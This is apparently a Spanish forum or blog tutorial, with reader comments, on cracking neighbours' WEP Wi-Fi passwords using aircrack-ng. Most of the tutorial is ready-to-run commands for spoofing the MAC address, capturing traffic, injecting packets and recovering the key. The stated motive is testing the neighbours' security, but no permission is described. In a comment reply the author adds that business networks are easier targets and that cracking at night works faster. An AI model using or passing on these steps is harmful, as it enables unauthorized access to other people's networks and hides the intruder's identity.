Hola a todos, desde hace tiempo he estado investigando sobre redes inalámbricas, he tenido una antena con la que me conectaba a un,bueno unos vecinos. Siempre estando abiertas por supuesto, sabiendo que si quisiera podría crackear la red a cualquier otro vecino, bueno al final de tanto tiempo sin intentarlo ni hacerlo, me he decidido a ver la seguridad que tienen mis vecinos con sus redes y notificándoles después los resultados obtenidos.
Bueno vamos a ver que es lo necesario para crackear o comprobar la seguridad de una red.
Lo primero que necesitamos un PC con UBUNTU,un WIFI,unos cuantos vecinos que tengan claves WEP y paciencia.
Empezamos instalando Aircrack con este comando :
$ sudo apt-get install aircrack-ng
Luego instalar Macchanger :
$ sudo apt-get install macchanger
Una vez hecho esto desconectar de la red wifi y ejecutar :
$ sudo airmon-ng start wlan0 <======= esta es la que tengo yo, en principio son todas iguales puede variar el numero.
podemos ver que mon0 esta activado entonces lo desactivamos :
$ sudo ifconfig mon0 down
Seguimos ahora ocultando la MAC de nuestra tarjeta de red wifi por otra que queramos :
$ sudo macchanger -m 00:11:22:33:44:55 mon0
Volvemos a conectar mon0, con la dirección MAC que le hemos dado:
$ sudo ifconfig mon0 up
Dejar escanear un tiempo las redes que ahí en los alrededores :
$ sudo airodump-ng mon0
Cuando salga la que os guste parar con Ctrl-C. Para poder descifrar la contraseña, es necesario que la columna #Data de la red sea diferente de cero, sino es que no hay transmisión de paquetes y no se podrá hacer nada.
Abrir otro terminal y ejecutar airodump-ng, con los siguientes datos (cambiando los corchetes y su interior con los de la red elegida):
sudo airodump-ng -c [CH] -w [ESSID] –bssid [BSSID] mon0
CH es el canal de la red ESSID es el nombre de la red BSSID es la dirección MAC
Abrir otro terminal, para ejecutar el ataque a la red :
$ sudo aireplay-ng -1 6000 -a [BSSID] -h 00:11:22:33:44:55 mon0
donde:
BSSID es la dirección MAC
Otro terminal mas:
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h 00:11:22:33:44:55 mon0
donde:
BSSID es la dirección MAC
Ahora la ultima terminal, donde se obtiene la clave descifrada:
$ sudo aircrack-ng -z [ESSID]*.cap
donde:
ESSID es el nombre de la red
Una vez ejecutado el ultimo punto se obtendrá la clave en formato XX:XX:XX:XX:XX:XX. Ya hemos crackeado la red.
buenas compañero te he estado buscando por el chat pero no te he vuelto ha ver
solo queria comentarte que he probado tu metodo para comprovar la seguridad de las redes wifi y he visto que cuando lo he intentado tarda mucho primero me pide pocos paquetes luego pasa a 5000 paquetes luego me subio a 10000 paquetes yo por tiempo no pude esperar mas de los 5000 paquetes me tardo en alcanzar los 5000 una hora
mi pregunta es la siguiente ¿es normal que vaya tan lento? ¿es normal que me pida tantos aquetes?
solo decir que me estoy iniciando en esto del mundo linux y las preguntas son para comprovar que todo lo hice bien.
muchas gracias por tu tiempo y volvere a intentarlo y lo dejare mas tiempo haber si consigo algo.
pd: muy buen tutotial y muy bien explicado.
Si, puede ser que vaya lento, no todo es facil todo depende de si hay un usuario conectado o no si hay un usuario conectado vuala parece facil pero ese usuario puede estar ausente para que vaya rapido tiene que haber trafico.
Si tan solo que se navegue un poco enseguida suben los paquetes por eso siempre es mas fácil, por decirlo así craquear una wep de una empresa que una privada a parte de que se recomienda en muchos casos hacerlo de noche que es cuando mas trafico suele haber.
Nada mas puedo comentarte Luismi y muy agradecido.